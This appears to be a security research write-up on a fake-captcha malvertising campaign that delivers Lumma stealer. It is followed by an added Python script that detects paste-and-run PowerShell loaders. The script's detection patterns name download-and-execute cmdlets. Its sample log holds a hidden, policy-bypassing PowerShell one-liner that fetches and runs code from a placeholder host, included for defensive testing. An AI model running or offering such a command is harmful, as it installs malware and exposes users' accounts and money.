Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.
Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, part of the PropellerAds network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.
For several weeks, a large-scale deceptive campaign has leveraged a cunning technique: tricking users into installing dangerous stealer malware via a captcha verification page. This seemingly legitimate captcha page appears unexpectedly as you browse a content site, perfectly mimicking a real verification process. It asks you to confirm you’re human through a series of keystrokes, which ultimately open the Run dialog on your Windows system. Unknowingly, you paste and execute a cleverly crafted PowerShell command, instantly installing stealer malware that targets your social accounts, banking credentials, passwords, and personal files. Vicious, effective, and dangerously evasive!
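The detection angle on the technique just described: a PowerShell one-liner pasted into the Run dialog shows up in process-creation telemetry as powershell.exe with explorer.exe as its parent, usually with a hidden window, a policy bypass and an inline download-and-execute. The following is an added example written for this page, not code from Guardio's write-up; the log format (tab-separated parent, image, command line), the indicator names, the scoring thresholds and the sample events (including the placeholder URL and base64 blob) are all constructed assumptions.

```python
"""Flag PowerShell launches that look like paste-and-run "fake captcha" payloads.

Added detection example (not Guardio's code). It scans constructed
process-creation log lines for powershell.exe started from the Windows Run
dialog (parent explorer.exe) with command-line traits typical of one-line
stealer loaders. Field layout, indicator names and thresholds are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Strong indicators: enough on their own to flag a Run-dialog launch.
STRONG_INDICATORS: Dict[str, re.Pattern] = {
    "remote_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b",
        re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
# Weak indicators: common in loaders but also in admin scripts; two or more together are flagged.
WEAK_INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "url": re.compile(r"https?://", re.I),
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    command_line: str
    run_dialog: bool        # PowerShell whose parent is explorer.exe (Win+R launches look like this)
    strong: List[str]
    weak: List[str]
    verdict: str            # "flag", "review" or "ignore"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_event(parent: str, image: str, command_line: str) -> Finding:
    """Score one process-creation event."""
    strong: List[str] = []
    weak: List[str] = []
    run_dialog = False
    if _basename(image) in POWERSHELL_IMAGES:
        run_dialog = _basename(parent) == "explorer.exe"
        strong = [n for n, rx in STRONG_INDICATORS.items() if rx.search(command_line)]
        weak = [n for n, rx in WEAK_INDICATORS.items() if rx.search(command_line)]
    if run_dialog and (strong or len(weak) >= 2):
        verdict = "flag"          # Run-dialog launch with loader traits: the scenario in the text
    elif strong:
        verdict = "review"        # loader traits, but a different launch path
    else:
        verdict = "ignore"
    return Finding(command_line, run_dialog, strong, weak, verdict)


def analyze_log(text: str) -> List[Finding]:
    """Parse tab-separated lines: parent_image<TAB>image<TAB>command_line (constructed format)."""
    findings = []
    for line in text.strip().splitlines():
        parent, image, command_line = line.split("\t", 2)
        findings.append(assess_event(parent.strip(), image.strip(), command_line.strip()))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; the URL and base64 blob are placeholders, not real indicators.
SAMPLE_LOG = "\n".join([
    "\t".join([r"C:\Windows\explorer.exe", PS,
               'powershell -w hidden -ep bypass -c "iex (irm https://cdn.example.invalid/verify)"']),
    "\t".join([r"C:\Windows\explorer.exe", PS,
               'powershell -NoProfile -Command "Get-ChildItem C:\\Logs"']),
    "\t".join([r"C:\Windows\System32\cmd.exe", PS,
               "powershell -nop -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="]),
    "\t".join([r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
               r"notepad.exe C:\Users\me\todo.txt"]),
])

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f.verdict:7} run_dialog={f.run_dialog!s:5} strong={f.strong} weak={f.weak}")
```

The explorer.exe parent is only a proxy for the Run dialog (shortcuts double-clicked in Explorer share it), which is why a launch with a single weak trait, such as the `-NoProfile` admin command above, is left alone while the download-and-execute one-liner is flagged; an encoded command arriving through cmd.exe is surfaced as "review" rather than dropped.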